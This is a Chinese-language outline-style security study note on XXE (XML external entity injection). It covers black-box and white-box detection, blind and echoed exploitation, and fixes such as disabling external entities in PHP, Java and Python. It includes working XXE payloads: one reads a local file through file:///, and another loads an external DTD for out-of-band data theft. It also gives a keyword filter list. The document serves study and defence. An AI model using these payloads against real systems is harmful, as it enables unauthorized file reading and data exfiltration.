-
xxe&xml
-
探针
-
黑盒
- content-type
- 获取得到Content-Type或数据类型为xml时,尝试xml语言payload进行测试
- svg&excel引用
- 数据格式
- content-type
-
白盒
- 可以通过应用功能追踪代码定位审计
- 可通过脚本特定函数搜索定位审计
- 可通过伪协议玩法绕过相关修复等
-
-
利用
-
无回显
- dtd实体带外访问,将数据参数发送
- HTTP带外访问,加载实体
- file读取文件,先读取
- 接受文件接受数据处理
-
有回显
-
file协议,读取文件
-
读取文件
- <?xml version="1.0"?>
- <!DOCTYPE xiaodi [
- <!ENTITY test SYSTEM "file:///d:/1.txt">
- ]>
- <user><username>&test;</username><password>xiaodi</password></user>
-
外部实体引用dtd
- <?xml version="1.0" ?>
- <!DOCTYPE test [
- <!ENTITY % file SYSTEM "http://127.0.0.1:80/xxe.dtd">
- %file;
- ]>
- <user><username>&send;</username><password>xiaodi</password></user>
-
- HTTP带外访问
-
- 伪装协议玩法
-
-
前置
- 缘由:传输和存储数据
- xml
- 危害:文件读取,端口探针
- 缘由:传输和存储数据
-
修复
- 禁用dtd实体引用
- 过滤关键字:<!DOCTYP <!ENTITY, SYSTEM PUBLIC
- 方案
-
禁用外部实体
- PHP
- libxml_disable_entity_loader(true);
- Java
- DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);
- python
- from lxml import etreexmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
- PHP
-
- 原理及漏洞
-
XXE(XML外部实体注入)漏洞
Dawndddddd2026-01-28 8:28
相关推荐
那个失眠的夜17 小时前
Mybatis延迟加载策略mfxcyh20 小时前
基于xml、注解、JavaConfig实现spring的iocvortex51 天前
SOAP 协议中的 XML 外部实体注入(XXE)漏洞Dxy12393102161 天前
Python如何对XML进行格式化2501_930707782 天前
使用C#代码将 HTML 转换为 PDF、XPS 和 XML研來如此7 天前
tinyxml2 常用读取接口对照表pupudawang8 天前
使用 Logback 的最佳实践:`logback.xml` 与 `logback-spring.xml` 的区别与用法jf加菲猫8 天前
第10章 数据处理Java成神之路-8 天前
序列化协议全解析:XML、SOAP、JSON 与 Protobuf 实战对比及 Protobuf 演进方案帅次8 天前
WebView 并发初始化竞争风险分析